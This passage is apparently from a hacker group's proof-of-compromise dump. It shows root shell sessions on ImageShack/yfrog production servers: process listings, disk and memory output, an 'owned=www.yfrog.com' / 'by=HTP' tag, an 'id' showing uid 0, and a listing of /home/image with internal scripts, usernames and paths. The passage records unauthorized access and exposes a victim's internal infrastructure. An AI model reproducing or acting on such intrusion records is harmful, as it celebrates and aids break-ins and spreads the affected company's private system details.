cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23721 0.0 0.0 298864 7960 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23722 0.5 0.1 302892 12860 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23723 0.0 0.0 298816 7332 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23724 0.0 0.0 298812 6652 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23726 0.0 0.0 297048 7828 ? S 19:57 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 23727 0.0 0.0 296744 5908 ? S 19:57 0:00 \_ /usr/lo
cal/fpm-upload/php-cgi --fpm --fpm-config /usr/local/fpm-upload/php-fpm.conf
apache 22631 0.5 0.1 22276 8580 ? Ss Aug24 34:06 /usr/local/
sbin/haproxy -f /etc/haproxy/haproxy.cfg -sf 5529
root 7659 0.0 0.0 804 64 ? S Aug27 0:00 -sh
root 7660 0.0 0.0 804 276 ? S Aug27 0:00 \_ -sh
root 24172 0.0 0.0 808 112 ? S 19:57 0:00 \_ -sh
root 24173 1.0 0.0 11400 1268 ? R 19:57 0:00 \_
ps auxwwf
root 8281 0.0 0.0 296724 3948 ? Ss 19:18 0:01 /usr/local/
fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18670 0.4 0.3 315828 25624 ? S 19:26 0:09 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18741 0.4 0.2 316404 24460 ? S 19:26 0:07 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18742 0.4 0.3 315748 25188 ? S 19:26 0:08 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 19591 0.4 0.3 316148 25328 ? S 19:27 0:08 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 21129 0.4 0.3 316644 25956 ? R 19:28 0:07 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 21196 0.4 0.3 317708 27548 ? S 19:28 0:07 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 23587 0.4 0.3 315516 25108 ? S 19:30 0:07 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 25054 0.4 0.3 316196 25280 ? S 19:31 0:06 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 26015 0.5 0.3 316756 28520 ? S 19:32 0:08 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 26053 0.4 0.3 316872 26096 ? S 19:32 0:07 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 26054 0.4 0.3 316188 25340 ? S 19:32 0:06 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 26122 0.4 0.3 315636 24892 ? S 19:32 0:06 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 29725 0.4 0.3 316684 25680 ? S 19:35 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 30010 0.5 0.2 315616 23888 ? S 19:35 0:06 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 30042 0.4 0.3 316644 25844 ? S 19:35 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 30954 0.4 0.3 318212 26464 ? S 19:36 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 31577 0.4 0.3 317752 26536 ? S 19:36 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 32418 0.4 0.2 315312 23916 ? S 19:37 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 32530 0.4 0.3 316900 26056 ? S 19:37 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 946 0.4 0.2 316192 24168 ? S 19:38 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 1015 0.4 0.3 316712 25416 ? S 19:38 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 1113 0.4 0.2 315704 23564 ? S 19:38 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 1962 0.5 0.2 315908 23976 ? S 19:39 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 2037 0.4 0.2 315080 23460 ? S 19:39 0:05 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 3762 0.4 0.3 316668 24800 ? S 19:40 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 3765 0.4 0.2 315344 23356 ? S 19:40 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 3767 0.3 0.3 316660 25592 ? S 19:40 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 4061 0.4 0.3 315908 25368 ? S 19:40 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 4956 0.4 0.3 316936 26040 ? S 19:41 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 4957 0.4 0.2 315368 23916 ? S 19:41 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 4991 0.4 0.3 316440 24700 ? S 19:41 0:04 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 8273 0.4 0.3 316740 25448 ? S 19:44 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 8336 0.4 0.3 314844 25928 ? S 19:44 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 8509 0.4 0.3 317500 25960 ? S 19:44 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 10213 0.4 0.2 315652 23496 ? S 19:45 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 10533 0.3 0.2 313536 24288 ? S 19:45 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 10534 0.4 0.2 316136 23600 ? S 19:45 0:03 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 11040 0.4 0.2 316100 24408 ? S 19:46 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 12288 0.3 0.2 316680 24312 ? S 19:47 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 12325 0.4 0.3 316952 25608 ? S 19:47 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13287 0.4 0.2 313020 22240 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13909 0.4 0.3 316332 24648 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13911 0.4 0.2 315268 23068 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13915 0.4 0.2 314020 23160 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13949 0.4 0.2 315356 23420 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13953 0.4 0.2 316652 24200 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13955 0.4 0.2 314048 23064 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13956 0.4 0.2 315596 22932 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13957 0.3 0.2 313784 22864 ? S 19:48 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13958 0.4 0.2 316664 24260 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13960 0.4 0.2 316112 23632 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13961 0.4 0.2 314048 24224 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13969 0.3 0.3 316916 24892 ? S 19:48 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13995 0.4 0.2 315340 22828 ? S 19:48 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13997 0.4 0.3 315372 25320 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 13999 0.4 0.2 315084 23544 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14000 0.4 0.2 315920 24304 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14001 0.3 0.2 315080 22452 ? S 19:48 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14002 0.4 0.2 316860 24408 ? S 19:48 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14070 0.4 0.2 316520 24264 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14441 0.4 0.2 315076 22660 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14759 0.4 0.2 313056 23692 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14762 0.4 0.2 315464 23180 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14763 0.3 0.2 314048 24072 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14764 0.4 0.2 316860 24272 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14766 0.5 0.2 315308 23732 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14767 0.4 0.2 313020 23576 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14770 0.3 0.2 315436 23376 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14802 0.3 0.2 316656 24064 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14803 0.3 0.2 316092 23112 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14804 0.4 0.2 314116 23872 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14806 0.4 0.2 314020 23020 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14807 0.3 0.2 313284 22592 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14809 0.4 0.2 313820 22716 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14810 0.4 0.2 315112 24256 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14811 0.4 0.2 314032 23260 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14813 0.4 0.2 316012 23476 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14814 0.2 0.2 314032 22704 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14818 0.5 0.2 315092 22652 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14819 0.4 0.2 314576 23876 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14821 0.3 0.2 313816 22644 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14823 0.4 0.2 312768 23144 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14825 0.4 0.2 315080 22572 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14858 0.4 0.2 313788 23312 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14859 0.3 0.2 315140 23348 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14861 0.4 0.2 314132 23036 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14863 0.4 0.2 315476 23936 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14895 0.4 0.2 313132 24168 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14897 0.3 0.2 313052 23044 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14898 0.4 0.2 315624 24124 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14899 0.4 0.2 316644 23776 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14934 0.4 0.2 313024 22320 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14967 0.4 0.2 314080 23856 ? S 19:49 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 14968 0.4 0.2 312992 22880 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 15003 0.3 0.2 314028 23072 ? S 19:49 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 16083 0.5 0.2 316108 22932 ? S 19:50 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 16302 0.3 0.2 316636 23904 ? S 19:50 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 16305 0.6 0.2 315588 23308 ? S 19:50 0:02 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 16371 0.4 0.2 315632 23920 ? S 19:50 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 17826 0.4 0.2 313020 22636 ? S 19:51 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 17893 0.4 0.2 314336 23364 ? S 19:51 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 17894 0.3 0.2 314580 24100 ? S 19:51 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18721 0.3 0.2 313536 22236 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18758 0.5 0.2 313984 23276 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18759 0.4 0.2 313564 22816 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18792 0.4 0.2 313016 22136 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18794 0.5 0.2 314312 23584 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18862 0.4 0.2 314044 23120 ? S 19:52 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 18866 0.3 0.2 313012 22696 ? S 19:52 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 19667 0.3 0.2 303044 19652 ? S 19:53 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 19699 0.4 0.2 314364 23672 ? S 19:53 0:01 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 19803 0.4 0.2 313276 20872 ? S 19:53 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 19804 0.3 0.2 315084 21456 ? S 19:53 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 21178 0.4 0.2 301244 18756 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 21213 0.4 0.2 304636 20244 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 21214 0.2 0.2 313576 23372 ? S 19:54 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22405 0.2 0.2 302304 19024 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22438 0.5 0.2 312768 21332 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22473 0.4 0.2 302080 19536 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22659 0.2 0.2 301260 17648 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22692 0.4 0.2 314144 21820 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22726 0.3 0.2 313508 20568 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22727 0.3 0.2 300996 17576 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 22728 0.4 0.2 302044 19232 ? S 19:55 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 23618 0.1 0.2 312912 17440 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 23620 0.0 0.1 301168 15628 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 23654 0.3 0.2 301792 17020 ? S 19:56 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
apache 23725 0.0 0.0 296684 3752 ? S 19:57 0:00 \_ /usr/lo
cal/fpm-yfrog/php-cgi --fpm --fpm-config /usr/local/fpm-yfrog/php-fpm.conf
# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 9.7G 2.0G 7.7G 21% /
/dev/sda3 15G 12G 3.5G 77% /disk1
/dev/sdb1 459G 1.3G 458G 1% /disk2
tmpfs 4.0G 4.0K 4.0G 1% /dev/shm
# free -m
total used free shared buffers cached
Mem: 8003 7712 291 0 920 4227
-/+ buffers/cache: 2563 5439
Swap: 9999 0 9999
# exit
logout
Connection to rdag3.prod.imageshack.com closed.
Priority 4: Special WWW servers
> root@stream.imageshack.us:~# export owned=www.yfrog.com
root@stream.imageshack.us:~# export by=HTP
root@stream.imageshack.us:~# export PS1='# '
# id
uid=0(root) gid=0(root) groups=0(root)
# ls -lah /home/image/
total 56M
drwxr-xr-x 20 image image 12K Aug 6 14:29 .
drwxr-xr-x 32 root root 4.0K May 22 15:00 ..
-rw------- 1 image image 28K Dec 12 2011 .bash_history
drwx------ 2 image image 4.0K Jun 29 2011 .ssh
drwxr-xr-x 3 image image 4.0K Nov 9 2010 .subversion
-rw------- 1 image image 7.7K Jul 25 2011 .viminfo
drwxr-xr-x 9 npettas users 4.0K Dec 31 2010 AWSSDKforPHP
-rwxrwxrwx 1 root root 46 Aug 22 22:59 alert_body.txt
-rw-r--r-- 1 root root 2 Mar 17 2011 alertcount.file
-rw-r--r-- 1 root root 710 Jan 6 2012 alerts-array.php
-rwxr-xr-x 1 root root 2.4K Jan 17 2012 alerts.php
-rwxr-xr-x 1 root root 2.4K Jan 17 2012 alerts.php.2012.01.17
-rwxrwxrwx 1 root root 507 Apr 22 2011 alerts.sh
drwxr-xr-x 5 root root 4.0K Feb 21 2011 backfile_base
-rw-r--r-- 1 root root 8.2K Feb 21 2011 backfill_yfrog.php
-rwxrwxrwx 1 root root 1 Jan 6 2012 badlinks.txt
-rw-r--r-- 1 root root 37 Sep 17 2010 bla.php
-rw-r--r-- 1 root root 1 Aug 22 22:59 capacity.txt
-rw-r--r-- 1 root root 0 Mar 18 2011 capacityalert.txt
-rw-r--r-- 1 macbeth users 1.3K Feb 1 2011 check200.php
-rw-r--r-- 1 root root 0 Mar 17 2011 command.file
drwxr-xr-x 5 root root 4.0K Jun 21 2011 contest_bin
drwxr-xr-x 5 root root 4.0K Jun 21 2011 contest_logs_yfrog
-rw-r--r-- 1 macbeth users 560 Jun 17 2010 count_daily.php
-rw-r--r-- 1 macbeth users 579 Jun 10 2010 count_daily_query.php
drwxr-xr-x 6 image users 4.0K Jan 5 2012 crons_stream
-rwxr-xr-x 1 macbeth users 4.8K May 30 2010 deleteClean.php
-rwxrwxrwx 1 root root 0 Aug 22 22:59 deletefail.txt
-rw-r--r-- 1 root root 2.0K Dec 12 2011 dev_thrift.inc
-rwxrwxrwx 1 root root 4 Apr 15 2011 dnsnotbalancing.txt
drwxr-xr-x 5 root root 4.0K Feb 15 2011 ex_report
lrwxrwxrwx 1 root root 45 May 29 2010 get_traffic.php -> /home/imag
e/svn/ops/tools/bin/get_traffic.php
lrwxrwxrwx 1 root root 45 May 29 2010 getaverage2.php -> /home/imag
e/svn/ops/tools/bin/getaverage2.php
lrwxrwxrwx 1 root root 46 May 29 2010 getrootdirs2.php -> /home/ima
ge/svn/ops/tools/bin/getrootdirs2.php
-rw-r--r-- 1 root root 0 Apr 20 2011 hbase1-region-servers.txt
drwxr-xr-x 6 image image 4.0K Nov 19 2010 hbase_logs
drwxr-xr-x 5 root root 4.0K Dec 3 2010 hbase_logs2
drwxr-xr-x 5 root root 4.0K Jan 28 2011 hbase_logs_semantic
drwxr-xr-x 5 root root 4.0K Jan 28 2011 hbase_logs_yfrog
drwxr-xr-x 2 root root 4.0K Nov 17 2010 image:image
-rwxrwxrwx 1 root root 197 Nov 26 2010 images
-rw-r--r-- 1 root root 0 Mar 17 2011 input.file
-rw-r--r-- 1 root root 813 Sep 16 2010 is_linkchecker.php
-rwxrwxr-x 1 image image 0 Dec 29 2011 loadlog
lrwxrwxrwx 1 root root 46 May 29 2010 mike_filter.py -> /home/image
/svn/ops/tools/image/mike_filter.py
-rw-r--r-- 1 root root 4.8K Dec 23 2010 mod_hbase.php
-rw-r--r-- 1 root root 8.9K Jun 28 2011 multi_mod.php
-rw-r--r-- 1 root root 7.3K Jun 28 2011 multi_semantic.php
-rw-r--r-- 1 root root 8.8K Sep 9 2011 multi_yfrog.php
